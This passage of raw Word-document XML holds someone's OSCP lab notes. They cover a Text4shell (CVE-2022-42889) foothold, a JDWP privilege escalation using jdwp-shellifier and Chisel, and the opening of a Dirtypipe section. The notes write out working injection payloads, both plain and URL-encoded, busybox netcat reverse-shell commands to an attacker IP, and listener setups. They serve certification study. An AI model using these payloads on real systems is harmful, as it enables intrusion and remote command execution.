        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_yrahpdmi6cim" w:id="530"/>
      <w:bookmarkEnd w:id="530"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache Commons Text 1.8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003894">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003895">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from OSCP-B .150 and got us foothold</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003896">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003897">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Checked out the website on port 8080</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003898">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I saw a /search directory, I found through guessing that you had to use the "query" parameter in order to query stuff. I guess the "query" parameter since default output was: {"query":"","result":""}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003899">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To search do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000389A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1200"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1238">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://192.168.117.150:8080/search?query=helloworld</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000389B">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And then I saw a CHANGELOG directory which outputted this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000389C">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 Changelog Version 0.2 - Added Apache Commons Text 1.8 Dependency for String Interpolation Version 0.1 - Initial beta version based on Spring Boot Framework - Added basic search functionality</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000389D">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I then searched up Apache Commons Text 1.8 and found the exploit Text4shell which is CVE-2022-42889</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000389E">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I found that we can get command execution as using this as the argument for the query:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000389F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="120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${script:javascript:java.lang.Runtime.getRuntime().exec('whoami')}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038A0">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But, I couldn't get nc, bash, or ping to work. So I looked at discord and we had to use this tool called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">busybox</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. BusyBox is basically a single lightweight binary that bundles tons of common Linux utilities into one file. This includes sh, ls, nc, and cat.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038A1">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So, we could use this to get a reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038A2">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busybox nc 192.168.45.232 4444 -e sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1200"/>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busybox nc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is how to use nc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038A4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1200"/>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-e sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> means "Execute /bin/sh and attach it to the socket"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038A5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1200"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-e</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag is part of nc, not busybox. Could have also done</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -e bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038A6">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I used this as my payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="120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${script:javascript:java.lang.Runtime.getRuntime().exec('busybox nc 192.168.45.232 4444 -e sh')}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038A8">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I then URL encoded it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="120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%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27busybox%20nc%20192.168.45.232%204444%20-e%20sh%27%29%7D</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038AA">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I then set up listener on port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038AB">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rlwarp nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038AC">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I then put it into URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1200"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1239">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://192.168.117.150:8080/search?query=</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId1240">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27busybox%20nc%20192.168.45.232%204444%20-e%20sh%27%29%7D</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038AE">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And I got back shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038B0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5bywjz4dln4g" w:id="531"/>
      <w:bookmarkEnd w:id="531"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JDWP </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038B1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038B2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Was seen in OSCP-B .150 and used for priv esc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038B4">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Use pspy and see this line:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="670"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> java -Xdebug -Xrunjdwp:transport=dt_socket,address=8000,server=y /opt/stats/App.java</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038B6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="670"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> java -Xdebug -Xrunjdwp means that it's running JDWP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038B7">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Use this exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="670"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1241">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/IOActive/jdwp-shellifier</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038B9">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I tried running python3, but it has syntax errors so I tried python2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038BA">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We look at ports on victim, and 8000 and 5000 are two of them, both of which are related to JDWP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038BB">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I tried accessing both using Ligolo, but it didn't work. I think it's because I already have a ligolo thing set up for the connection to 10.10.xxx.0/24 subnet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038BC">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So I tried Chisel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038BD">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Run this on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67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chisel server -p 8888 --reverse</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038BF">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Run this on victim</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67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./chisel client 192.168.45.232:8888 R:5000:127.0.0.1:5000 R:8000:127.0.0.1:8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="670"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This port forwards both 5000 and 8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038C2">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Then we run exploit. notice we had to use</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> busybox, just like in the foothold</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67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python2 jdwp-shellifier.py -t 127.0.0.1 --cmd 'busybox nc 192.168.45.232 4444 -e /bin/bash'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038C4">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38C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67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nc -lvnp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038C6">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And then we activate it by accessing port 5000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038C7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="67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nc 127.0.0.1 5000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="670"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Turns out 5000 was actually not only listening on internal 127.0.0.1, so you actually didn't need to port forward 5000, and could just activate it by using</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> nc 192.168.xxx.150 5000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="670"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And we get shell back!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038CB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dzpfhv5ja90" w:id="532"/>
      <w:bookmarkEnd w:id="532"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038CC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_x0r4i6635hcj" w:id="533"/>
      <w:bookmarkEnd w:id="533"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dirtypipe (CVE-2022-0847)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038CD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038CE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable: 5.8 → 5.16.10 (inclusive), 5.15 → 5.15.24, 5.10 → 5.10.101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038D0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From OSCP-B .149</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Priv Esc (via Dirtypipe)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000038D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="752"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">There were many ways to find this. First, we could have looked at the kernel using uname -a</w:t>
